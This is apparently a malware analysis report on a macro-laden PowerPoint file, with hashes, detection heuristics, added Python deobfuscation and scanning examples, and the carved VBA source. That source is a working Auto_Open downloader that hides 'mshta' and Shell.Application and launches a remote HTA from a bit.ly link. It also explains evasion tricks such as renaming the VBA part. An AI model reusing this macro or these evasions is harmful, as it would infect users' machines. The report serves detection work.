Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2d7d584547eaab96…

MALICIOUS

Office (OOXML)

Size: 10.6 KB    First seen: 2021-06-13
MD5:     1bc7ed3392671d40341411d849f3b9b9
SHA-1:   d98b7b14cf2a1562a59672db1a12a256d3de4294
SHA-256: 2d7d584547eaab960cfc264d392ff5f9e08787f6586488a5ff9d5b9ff3281b30
Risk score: 172

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is an OOXML (PowerPoint) document containing VBA macros. The Auto_Open macro (spelled AutO_opEn, with every statement split across " _" line continuations) launches a second stage: a helper class reassembles the LOLBin name 'mshta' from single-character literals ("m" + "s" + "h" + "t" + "a") and returns the URL 'https://www.bitly.com/asiajiaiwn', and the macro then calls ShellExecute on a Shell.Application object with those two arguments, so mshta.exe fetches and runs whatever HTA the shortened link resolves to. The Shell.Application object is obtained through GetObject on a StrReverse'd literal that resolves to the moniker 'new:13709620-C279-11CE-A49E-444553540000', the CLSID of Shell.Application, so neither the ProgID nor the CLSID appears anywhere in the source; the method name is written as ShellExecute@ (a VBA type-declaration suffix), presumably to break exact-token matching. Nothing in the macro writes to disk, the registry or a startup location: the obfuscated GetObject call is an object-instantiation evasion, not persistence, and the sample is a one-shot downloader/launcher.
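The string tricks described above can be undone statically. The following is an added example (not part of the original report or of any analysis tool): a small deobfuscator that joins VBA line continuations, folds split string literals, evaluates StrReverse on literals and labels what comes out. The statements in MACRO_SRC are copied from the macros.bas artifact carved from this sample further down in the report; the KNOWN_CLSIDS table, the KEYWORDS set and all function names are this example's own.

```python
import re

# Statements reproduced from the macro source carved from the sample (see the
# macros.bas artifact in this report); the " _" line splitting and the
# "m" + "s" + ... concatenation are the sample's own obfuscation.
MACRO_SRC = '''bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
        getEnumName _
        = _
        "https://www.bitly.com/asiajiaiwn"
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
'''

# CLSIDs worth recognising behind a "new:" moniker (own lookup table, extend as
# needed); Shell.Application is the one this sample instantiates.
KNOWN_CLSIDS = {
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}

# LOLBins / APIs that only become visible after literals are folded together.
KEYWORDS = {"mshta", "powershell", "cmd", "wscript.shell",
            "scripting.filesystemobject", "urldownloadtofile", "shellexecute"}

_CONT = re.compile(r"[ \t]+_[ \t]*\r?\n[ \t]*")
_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')
_STRREV = re.compile(r'StrReverse\s*\(\s*"([^"]*)"\s*\)', re.IGNORECASE)


def join_continuations(src):
    """Undo VBA line continuation: a line ending in ' _' continues on the next."""
    return _CONT.sub(" ", src)


def fold_literals(line):
    """Collapse "a" + "b" / "a" & "b" chains into one literal, left to right."""
    while True:
        folded = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), line)
        if folded == line:
            return line
        line = folded


def fold_strreverse(line):
    """Evaluate StrReverse("...") applied to a literal at analysis time."""
    return _STRREV.sub(lambda m: '"%s"' % m.group(1)[::-1], line)


def deobfuscate(src):
    """Return the macro with continuations joined and static string tricks resolved."""
    return "\n".join(fold_strreverse(fold_literals(ln))
                     for ln in join_continuations(src).splitlines())


def extract_strings(src):
    """All double-quoted literals, in source order."""
    return re.findall(r'"([^"]*)"', src)


def classify(strings):
    """Label each recovered literal: CLSID moniker, known keyword, or URL."""
    findings = []
    for s in strings:
        m = re.fullmatch(r"new:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})", s)
        if m:
            findings.append(("clsid-moniker", s,
                             KNOWN_CLSIDS.get(m.group(1).upper(), "unknown CLSID")))
        elif s.lower() in KEYWORDS:
            findings.append(("keyword", s, "LOLBin/API name"))
        elif re.match(r"https?://", s, re.IGNORECASE):
            findings.append(("url", s, "remote resource"))
    return findings


def summarize(src):
    """Full chain: raw macro text -> list of (kind, value, label) findings."""
    return classify(extract_strings(deobfuscate(src)))


if __name__ == "__main__":
    print(deobfuscate(MACRO_SRC))
    for kind, value, label in summarize(MACRO_SRC):
        print(f"{kind:14} {value}  ->  {label}")
```

Run stand-alone it prints the joined, folded source and three findings: the keyword mshta, the bit.ly URL, and the moniker new:13709620-C279-11CE-A49E-444553540000 resolved to Shell.Application. Folding is done before keyword matching on purpose: matching the raw source would see only "m", "s", "h", "t", "a".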

Heuristics (7)

  • VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
    Document contains a VBA project (project part renamed away from vbaProject.bin: ppt/aw.bin).
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenations serves no purpose other than evading keyword scanning.
    Matched lines in script:
      . _
      ShellExecute@ _
      NamakBora _
  • VBA project part renamed to evade filename detection [high] OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Office and other legitimate producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call [high] OLE_VBA_GETOBJ
    Matched lines in script:
      = _
      GetObject _
      (StrReverse _
  • Auto_Open macro [low] OLE_VBA_AUTO
    Matched lines in script:
      Sub _
      AutO_opEn _
      ()
  • VBA project is signed but not by a recognised publisher [info] VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity: malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www.bitly.com/asiajiaiwn (channel: document text, OOXML body / shared strings)
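The OOXML_VBA_PROJECT_RENAMED finding rests on one point: Office locates the VBA project through the content-type override and the vbaProject relationship, never through the file name, so a scanner that only looks for vbaProject.bin can be bypassed by renaming the part. The example below is added here and is not part of the report or of any analysis tool; it builds a constructed minimal package (not the real sample) with the project bound under a caller-chosen part name, then shows a path-only scan missing it while a relationship-aware check finds it and raises the report's two rule names. The content type and relationship URIs are the standard ones; the function names are this example's own.

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
VBA_CT = "application/vnd.ms-office.vbaProject"
VBA_REL = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"


def build_sample(part_name):
    """Constructed minimal macro-enabled package (not the real sample): the VBA
    project is bound, by content type and by relationship, under whatever part
    name the caller chooses, e.g. 'ppt/aw.bin' as in this report."""
    target = posixpath.basename(part_name)  # relationship targets are relative to ppt/
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   f'<Types xmlns="{CT_NS}">'
                   f'<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                   f'<Default Extension="xml" ContentType="application/xml"/>'
                   f'<Override PartName="/{part_name}" ContentType="{VBA_CT}"/>'
                   f'</Types>')
        z.writestr("ppt/_rels/presentation.xml.rels",
                   f'<Relationships xmlns="{REL_NS}">'
                   f'<Relationship Id="rId9" Type="{VBA_REL}" Target="{target}"/>'
                   f'</Relationships>')
        z.writestr("ppt/presentation.xml", "<p/>")
        # Stand-in for the OLE container: compound-file magic plus padding.
        z.writestr(part_name, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 8)
    return buf.getvalue()


def path_only_scan(data):
    """What a naive scanner does: look for the conventional part name only."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(n.endswith("vbaProject.bin") for n in z.namelist())


def find_vba_parts(data):
    """Resolve VBA project parts the way Office does: via the content-type
    override and the vbaProject relationship, ignoring the part's file name."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        types = ET.fromstring(z.read("[Content_Types].xml"))
        for ov in types.iter(f"{{{CT_NS}}}Override"):
            if ov.get("ContentType") == VBA_CT:
                found.add(ov.get("PartName").lstrip("/"))
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            base = posixpath.dirname(posixpath.dirname(name))  # ppt/_rels/x.rels -> ppt
            for rel in ET.fromstring(z.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == VBA_REL:
                    found.add(posixpath.normpath(posixpath.join(base, rel.get("Target"))))
    return sorted(found)


def check_vba_project(data):
    """Emit the two rule names this report raises for the sample."""
    parts = find_vba_parts(data)
    findings = []
    if parts:
        findings.append("OOXML_VBA")
    if any(posixpath.basename(p) != "vbaProject.bin" for p in parts):
        findings.append("OOXML_VBA_PROJECT_RENAMED")
    return {"vba_parts": parts, "findings": findings}


if __name__ == "__main__":
    for part in ("ppt/vbaProject.bin", "ppt/aw.bin"):
        pkg = build_sample(part)
        print(part, "path-only:", path_only_scan(pkg), check_vba_project(pkg))
```

The check collects part names from both binding mechanisms and unions them, because a producer can drop one and keep the other; a renamed part that is bound only through the relationship is still found. Output-side, the same idea applies to vbaProjectSignature.bin (the second artifact in this report): locate it through its relationship, not its name.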

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1270 bytes
  SHA-256: 448d925440af421c776aed9e78dbc2f262d9d9bdbf6bfa495a32211b589ae697
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asiajiaiwn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/aw.bin | 19968 bytes
  SHA-256: f853232e8123f41bbb1b224c72efb20353a8d41a66533d6b520cd98c5a655862
vbaProject_01.bin | vba-project | OOXML VBA project signature: ppt/vbaProjectSignature.bin | 1928 bytes
  SHA-256: b0d44d5f5c9a29714228d958ca3ae1502239c72bbcc32beb43afca801a1a60e0